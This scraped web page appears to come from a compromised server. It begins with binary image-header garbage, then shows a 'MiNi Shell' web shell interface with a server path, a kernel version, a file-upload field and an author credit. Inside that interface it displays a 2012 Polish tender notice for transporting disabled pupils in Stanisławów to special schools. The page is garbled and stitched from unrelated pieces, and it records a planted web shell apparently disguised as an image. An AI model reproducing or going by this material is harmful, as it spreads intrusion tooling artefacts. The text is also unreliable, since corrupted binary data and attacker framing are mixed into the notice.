JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120727/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120727/274280-N-2012.html

<p class="kh_header"><b>Stanisławów: Transport uczniów niepełnosprawnych zamieszkałych na terenie Gminy Stanisławów do szkół specjalnych  w roku szkolnym 2012/2013</b><br>
<b>Numer ogłoszenia: 274280 - 2012; data zamieszczenia: 27.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samorządowy Zespół Oświatowo-Wychowawczy , ul. Szkolna 4, 05-304 Stanisławów, woj. mazowieckie, tel. 025 7575156, faks 025 7575156.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szow.stanislawow.samorzady.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Transport uczniów niepełnosprawnych zamieszkałych na terenie Gminy Stanisławów do szkół specjalnych  w roku szkolnym 2012/2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Transport uczniów niepełnosprawnych zamieszkałych na terenie Gminy Stanisławów do szkół specjalnych  w roku szkolnym 2012/2013
Wspólny Słownik Zamówień (CPV)
kod CPV 60112000 -6  - (1) Usługi w zakresie publicznego transportu drogowego
3.1	Dowóz uczniów będzie odbywał się w dniach nauki szkolnej i polegał na przewozie dzieci na trasie dom - szkoła - dom do niżej wymienionych szkół specjalnych w Mińsku Mazowieckim, Warszawie oraz Ignacowie:
a)	Do Specjalnego Ośrodka Szkolno - Wychowawczego w Mińsku Mazowieckim ul. Stankowizna 42/44 z miejscowości:
	1 uczeń zamieszkały Rządza
	1 uczeń zamieszkały Cisówka 
	1 uczeń zamieszkały Stanisławów ul. Żytnia 
b)	Do Zespołu Szkół Specjalnych w Ignacowie: 
	1 uczeń z miejscowości Stanisławów ul. Pograniczna
c)	Do Zespołu Szkół im Kazimierza Wielkiego w Mińsku Mazowieckim ul. Budowlana
	1 uczeń z miejscowości Stanisławów ul. Młynarska
	1 uczeń z miejscowości Borek Czarniński 
d)	Do Zespołu Szkół Specjalnych w Warszawie ul. Łucka 17/23:  
	1 uczeń z miejscowości Ładzyń

3.2	Żaden z uczniów nie wymaga wózka inwalidzkiego.   
3.3	W przypadku gdy wystąpi konieczność dowożenia większej liczby dzieci, a Wykonawca będzie posiadał wolne miejsca w pojeździe i nie spowoduje to wydłużenia trasy przejazdu wówczas cena za usługę nie ulegnie zmianie. W przypadku gdy zwiększenie liczby dowożonych uczniów spowoduje konieczność wydłużenia trasy cena za usługę może ulec zmianie proporcjonalnie do wydłużenia trasy.   
3.4	Wykonawca gwarantuje bezpieczeństwo osób i mienia podczas realizacji zamówienia. W związku z powyższym - Zamawiający nie bierze żadnej odpowiedzialności za wypadki i zdarzenia, w wyniku których nastąpi szkoda materialna, uszkodzenie ciała lub śmierć spowodowana działalnością Wykonawcy
3.5	Przed przystąpieniem do realizacji zamówienia Wykonawca ustali optymalny rozkład jazdy mając na uwadze jak najkrótszy okres przebywania dziecka w podróży oraz następujące wymagania:
3.5.1	Dziecko powinno być dowiezione do szkoły w takim czasie, aby możliwe było rozpoczęcie przez nie punktualne zajęć szkolnych oraz odebranie dziecka w takim czasie, aby nie powodować zbyt długiego oczekiwania na powrót do domu.
3.5.2	Szczegółowy plan transportu ustali Wykonawca z rodzicami (opiekunami prawnymi) uczniów na podstawie planów lekcji dowożonych dzieci.
3.5.3	Osoby sprawujące opiekę nad przewożonymi uczniami niepełnosprawnymi muszą być wyposażone w środek łączności - telefon komórkowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamówienie uzupełniające będzie udzielone wówczas gdy w okresie realizacji zamówienia nastąpi konieczność dowożenia większej liczby dzieci do szkół specjalnych.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 60.11.20.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 03.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać zezwolenie na wykonywanie krajowego przewozu osób (licencję). Zamawiający dokona oceny spełnienia powyższych warunków na podstawie złożonych  dokumentów: - w formie załącznika nr 2 - aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej,wystawionego nie wcześniej nią 6 miesięcy przed upływem terminu składania ofert bądź oświadczenie o wpisie do ewidencji działalności gospodarczej; - w formie załącznika nr 3 - licencję na wykonywanie krajowego transportu drogowego osób wydanej na podstawie art. 7 ust. 2 pkt 1 ustawy z dnia 6 września 2001 r. o transporcie drogowym (Dz.U.Nr 125, poz. 13371, z późn.zm.).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać wykonanie działalności polegającej na przewozie uczniów niepełnosprawnych w ciągu ostatnich trzech lat przed dniem wszczęcia postępowania (bądź krótszym, o ile okres działalności jest krótszy) o wartości co najmniej 40 tys. zł. Zamawiający dokona oceny spełnienia powyższych warunków na podstawie złożonych dokumentów: - w formie załącznika nr 11 - referencje z ostatnich trzech lat przed dniem wszczęcia postępowania (bądź krótszym, o ile okres działalności jest krótszy) stwierdzające prowadzenie działalności polegającej na przewozie uczniów niepełnosprawnych o wartości co najmniej 40 tys. zł. Zamawiający będzie brał pod uwagę wyłącznie zamówienia, które zostaną poparte dokumentem potwierdzającym, że zlecone prace zostały wykonane z należytą starannością. W dokumencie tym powinien widnieć termin i wartość wykonanego zlecenia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać lub mieć zapewniony dostęp[ (poprzez dzierżawę, wynajem, itp.) do w pełni sprawnych jednostek sprzętu i wyposażenia technicznego, koniecznych do prawidłowego wykonania zamówienia, czyli pojazdu przystosowanego do przewozu osób niepełnosprawnych z aktualnym badaniem technicznym oraz ubezpieczeniem OC i NW. Zamawiający dokona oceny spełnienia powyższych warunków na podstawie złożonych dokumentów: - w formie załącznika nr 6 - potencjał techniczny tj. wykaz środków transportowych niezbędnych do realizacji zamówienia jakimi dysponuje Wykonawca oraz oświadczenie potwierdzające, że pojazd jest przystosowanym  do przewozu osób niepełnosprawnych; - w formie załącznika nr 7 - kserokopie dowodów rejestracyjnych pojazdów, które będą prowadzić dowożenie z aktualnym przeglądem technicznym pojazdów; - w formie załącznika nr 8 - kserokopie aktualnych polis ubezpieczeniowych pojazdów.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi nie podlegać wykluczeniu na podstawie art. 24 ustawy prawo zamówień publicznych z dnia 29 stycznia 2004 r., musi spełniać warunki określone przepisami  art. 22 ust. 1 ustawy j.w. Wykonawca musi dysponować potencjałem kadrowym posiadającym odpowiednie przygotowanie do wykonywania podstawowych czynności pielęgnacyjno - opiekuńczych wobec dzieci niepełnosprawnych podczas transportu oraz przeszkolenie w zakresie udzielania pierwszej pomocy  medycznej lub przedmedycznej albo posiadającymi co najmniej 6-cio miesięczne doświadczenie w opiece nad osobami niepełnosprawnymi. Zamawiający dokona oceny spełnienia powyższych warunków na podstawie złożonych dokumentów: - w formie załącznika nr 1 - oświadczenie o spełnieniu warunków art. 22 ust. 1 i nie podleganie wykluczeniu z postępowania na podstawie art. 24 ustawy prawo zamówień publicznych (na druku załączonym do materiałów przetargowych); - w formie załącznika nr 9 - kserokopie praw jazdy kierowców; - w formie załącznika nr 10 - potencjał kadrowy wg wzoru, stanowiącego załącznik nr 4 SIWZ wraz z dokumentami poświadczającymi ich kwalifikacje, zgodnie z wymaganiami, o których mowa w pkt. 8.6 SIWZ;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia powyższych warunków na podstawie złożonych dokumentów: - w formie załącznika nr 4 - oświadczenie o braku zaległości podatkowych na druku będącym załącznikiem nr 5 do SIWZ, - w formie załącznika nr 5 - oświadczenie o braku zaległości w uiszczaniu składek na ubezpieczenie zdrowotne lub społeczne na druku będącym załącznikiem nr 6 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> szow.stanislawow.samorządy.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samorządowy Zespół Oświatowo - Wychowawczy, ul.Szkolna4,05-304 Stanisławów, pow. miński, woj. mazowieckie, tel/fax (25) 7575156, e-mail szow_stanislawow@pro.onet.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.08.2012 godzina 11:00, miejsce: Samorządowy Zespół Oświatowo - Wychowawczy, ul.Szkolna4,05-304 Stanisławów, pow. miński, woj. mazowieckie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com